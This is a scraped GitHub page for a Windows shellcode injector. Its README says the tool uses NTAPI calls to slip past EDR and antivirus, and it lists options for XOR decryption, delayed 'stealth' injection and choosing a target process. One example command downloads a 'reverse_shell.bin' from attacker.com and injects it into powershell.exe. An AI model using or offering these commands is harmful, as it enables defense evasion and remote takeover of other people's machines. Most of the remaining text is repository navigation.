Windows NTAPI shellcode injector

Inject shellcode from memory to process using Windows NTAPI for bypassing EDRs and Antiviruses

Download shellcode from URL
Listen and wait for shellcode

Usage

Usage:
        Injector.exe -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -l <LISTEN_PORT> [-k <xor_key>]
        Injector.exe -h
Options:
        -h       Show this menu.
        -u       URL to donwload shellcode from (Not listen mode).
        -p       PID/Process name to be injected (Optional).
        -l       Listen mode port (Not download mode).
        -k       XOR key to use for decryption.
        -s       Stealth mode - the decryption and injection will start after given seconds (Default 18).
        -m       Injection mode - NT or normal(VirtualAllocEx, WriteProcessMemory, CreateRemoteThread).

Examples

Download and inject to powershell.exe

injector.exe -u http://attacker.com/reverse_shell.bin -p powershell.exe

Wait for connection on port 8080, receive shellcode and inject to owned notepad.exe

injector.exe -l 8080

Name		Name	Last commit message	Last commit date
Latest commit History 22 Commits
.vs/NativeInjection/v16		.vs/NativeInjection/v16
NativeInjection		NativeInjection
x64		x64
LICENSE		LICENSE
NativeInjection.sln		NativeInjection.sln
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Windows NTAPI shellcode injector

Usage

Examples

About

Releases

Packages

Contributors 2

Languages

License

elddy/Windows-NTAPI-Injector

Folders and files

Latest commit

History

Repository files navigation

Windows NTAPI shellcode injector

Usage

Examples

About

Topics

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Contributors 2

Languages

Packages